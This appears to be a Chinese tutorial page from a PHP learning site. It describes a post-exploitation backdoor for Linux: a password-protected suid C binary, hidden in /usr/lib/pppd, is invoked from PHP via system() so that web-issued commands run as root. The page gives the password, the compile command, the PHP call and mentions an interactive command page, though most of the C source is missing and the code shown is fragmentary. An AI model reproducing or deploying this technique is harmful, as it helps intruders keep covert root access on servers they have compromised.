来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] 放暑假了,真是无聊啊,于是研究研究后门。以前一直有一种想法:Linux提权后,各种后门不隐蔽,各种防火墙很BT,能不能让PHP继承suid权限,当作后门。经过测试,这个想法是可行的。...
放暑假了,真是无聊啊,于是研究研究后门。
以前一直有一种想法:Linux提权后,各种后门不隐蔽,各种防火墙很BT,能不能让PHP继承suid权限,当作后门。 首先编写一段C,名为:run.c,并赋予suid权限。 #include <stdio.h> 程序接收三个以上参数,特定第三个参数为密码(即argv[2]),char*pass=”imspider”; 密码为imspider。 这里我把run.c编译到/usr/lib/pppd路径下: root@spider:/usr/lib/pppd# gcc -Wall -o run run.c 下面PHP代码是重点: <?php system(‘/usr/lib/pppd/run whoami imspider’);//调用run查看当前用户,输出root。 我比较无聊,做了个命令交互页面。 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com